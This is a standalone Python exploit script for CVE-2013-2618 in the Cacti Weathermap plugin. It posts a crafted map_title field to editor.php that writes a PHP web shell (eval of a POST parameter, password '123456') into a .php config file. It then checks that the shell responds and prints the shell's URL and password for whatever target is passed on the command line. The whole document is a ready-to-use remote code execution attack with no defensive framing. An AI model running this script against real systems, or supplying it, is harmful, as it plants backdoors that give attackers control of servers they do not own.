#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CVE-2013-2618

import hashlib
import requests
import sys
import time
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

shellpass = "123456"
signature = hashlib.md5(b"POC").hexdigest()
map_title = "<?php echo @md5('POC');@eval($_POST['%s']);?>" % (shellpass,)
mapname = str(int(time.time())) + ".php"

payload = {
"plug": "0",
"mapname": mapname,
"action": "set_map_properties",
"param": "",
"param2": "",
"debug": "existing",
"node_name": "",
"node_x": "",
"node_y": "",
"node_new_name": "",
"node_label": "",
"node_infourl": "",
"node_hover": "",
"node_iconfilename": "--NONE--",
"link_name": "",
"link_bandwidth_in": "",
"link_bandwidth_out": "",
"link_target": "",
"link_width": "",
"link_infourl": "",
"link_hover": "",
"link_commentin": "",
"link_commentposin": "95",
"link_commentout": "",
"link_commentposout": "5",
"map_title": map_title,
"map_legend": "Traffic+Load",
"map_stamp": "Created:+%b+%d+%Y+%H:%M:%S",
"map_linkdefaultwidth": "7",
"map_linkdefaultbwin": "100M",
"map_linkdefaultbwout": "100M",
"map_width": "800",
"map_height": "600",
"map_pngfile": "",
"map_htmlfile": "",
"map_bgfile": "--NONE--",
"mapstyle_linklabels": "percent",
"mapstyle_htmlstyle": "overlib",
"mapstyle_arrowstyle": "classic",
"mapstyle_nodefont": "3",
"mapstyle_linkfont": "2",
"mapstyle_legendfont": "4",
"item_configtext": "",
"editorsettings_showvias": "0",
"editorsettings_showrelative": "0",
"editorsettings_gridsnap": "NO",
}

def exploit(target):
    URL = target + "/plugins/weathermap/editor.php"
    try:
        r = requests.post(URL, data=payload, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        return False
    else:
        shell = check_shell(target)
        if not shell:
            return False
        else:
            return shell

def check_shell(target):
    URL = target + "/plugins/weathermap/configs/" + mapname
    try:
        r = requests.get(URL, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        return False
    else:
        if signature not in r.text:
            return False
        else:
            return URL + ", " + shellpass

def main():
    try:
        target = sys.argv[1]
    except IndexError as e:
        print("CVE-2013-2618")
    else:
        result = exploit(target)
        print(result)

if __name__ == "__main__":
    main()